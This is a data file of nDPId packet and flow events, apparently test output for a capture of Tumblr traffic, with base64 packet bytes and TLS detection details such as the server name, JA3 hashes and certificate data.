+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14195,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbuqUp8VmAL\/uLoKgBALilfCAAABAQgKwt3K8Ev+J\/w="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14196,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbuMNGE5TmUER3k8gBALhgqfAAABAQgKwt3K8YvcoGw="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14197,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBOAuKJ+lo8zNmgBALjxSdAAABAQgKwt3K8thacjc="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14198,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbushBIGKmVwrG4jgBANXT4sAAABAQgKwt3K8WUYg3I="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14199,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvBipT7vGL368ShgBALhSEJAAABAQgKwt3K8eX1Gck="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14200,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvk9gGGELJipjJqgBALQBJ2AAABAQgKwt3K8aG8sBY="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14201,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvk+M+Z1rOqVQHwgBALQGcqAAABAQgKwt3K8aG8sBU="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14202,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBNmN7X0wHcAwfgBALjg4+AAABAQgKwt3K8thacg8="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14203,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvk+vuVlIuY4OlPgBALOKdvAAABAQgKwt3K8qG8sBY="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14204,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvhvNVWQYa3RpcegBALd4k3AAABAQgKwt3K8rgmZ+0="} 
+00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23343,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292118602,"flow_last_seen":1605292118602,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292118602,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23343,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605292118602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118602,"pkt":"qtsDr8lk5EKm5WPyht1gAi73ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtWCxtoBu1KGqo810Lv\/gBAB9aO7AAABAQgKDow6U8LdGxc="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23344,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292118714,"flow_last_seen":1605292118714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292118714,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23344,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605292118714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118714,"pkt":"qtsDr8lk5EKm5WPyht1gADFFACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAEv1wBu54AWFX+ZWnrgBAB9ax4AAABAQgKIY6128LdIt0="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605292118777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118777,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAANg61YIqAcsBIEmLB5kd7IUo3\/YpAbvG2jXQu\/9ShqqQgBAMVq52AAABAQgKwt3S6w6JbWQ="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23346,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605292118786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgRAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbu\/XP5laeueAFhWgBALgb+AAAABAQgKwt3S8iGL6TM="} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23347,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292119370,"flow_last_seen":1605292119370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292119370,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23347,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605292119370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292119370,"pkt":"qtsDr8lk5EKm5WPyht1gB9dmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAO4aoBuwkMYXdt3wkTgBAGDPrTAAABAQgKuCcls8LdJNk="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23348,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605292119458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292119458,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvhqm3fCRMJDGF4gBAMQfSOAAABAQgKwt3Va7gmdTA="} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23349,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23349,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gBWy\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAO4pQBuzf4sNBRRFrJgBAB9RDeAAABAQgKzK1LLsLdJJ0="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23350,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23350,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gD6CDACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1uYBu2Ue7VYDxGJbgBAB9U4jAAABAQgKcJlSucLdI9M="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23351,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23351,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gCJJIACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAEv2oBu3NXQRgXN+V5gBAZpzN2AAABAQgKIY69b8LdKhI="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23359,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605292120839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120839,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgIAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvilFFEWsk3+LDRgBALmwajAAABAQgKwt3a98yslWg="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23360,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120853,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvW5gPEYltlHu1XgBALmkPeAAABAQgKwt3bBnCYnCU="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23362,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120853,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgRAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbu\/ahc35XlzV0EZgBAPBj1lAAABAQgKwt3bBiGODSw="} 
+00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121486,"flow_last_seen":1605292121486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292121486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605292121486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121486,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+osAAAAAoAL9IJMMAAACBAWgBAIICpi1TMUAAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23416,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605292121507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121507,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAEpymhYqAcsBIEmLB5kd7IUo3\/YpAbupQGb5NYUDXPqMoBJXgPvWAAACBAV4AQMDAwQCCArC3d2UmLVMxQ=="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23417,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605292121507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121507,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+oxm+TWGgBAB+3\/SAAABAQgKmLVM28Ld3ZQ="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121674,"flow_last_seen":1605292121674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292121674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605292121674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121674,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v36ZlfzugBAB9Zh5AAABAQgKG7m2dMLdLYw="} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605292121698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121698,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgXAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvZCJmV\/O79d79\/gBALlo7gAAABAQgKwt3eUxu5BaQ="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122064,"flow_last_seen":1605292122064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605292122064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122064,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGkAAAAAoAL9IOE8AAACBAWgBAIICthbOh0AAAAAAQMDBw=="} 
+00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605292122076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":172,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":172,"pkt_l4_len":118,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAHYGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd9sejoTgBgk6QsuAAABAQgKJEeQFMLc4vQXAwMAUQAAAAAAAAAPN+72C7wfHoQtmaJB3aOHKjPk6JlEWLNjF5TOq7HiJ1O2KSnCxtEIEQAeO4GmbeSTOkkpawAah7BKsajx09L6L57ZkTTcEWLCJA=="} +00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23634,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605292122076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAE4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2QjVsejoTgBgk6YPXAAABAQgKJEeQFMLc4vQXAwMAKQAAAAAAAAAQ4G\/3mQ3kGgQra1eBqPYCTvM1QPmaUoG2gBnwdZPdmFLU"} 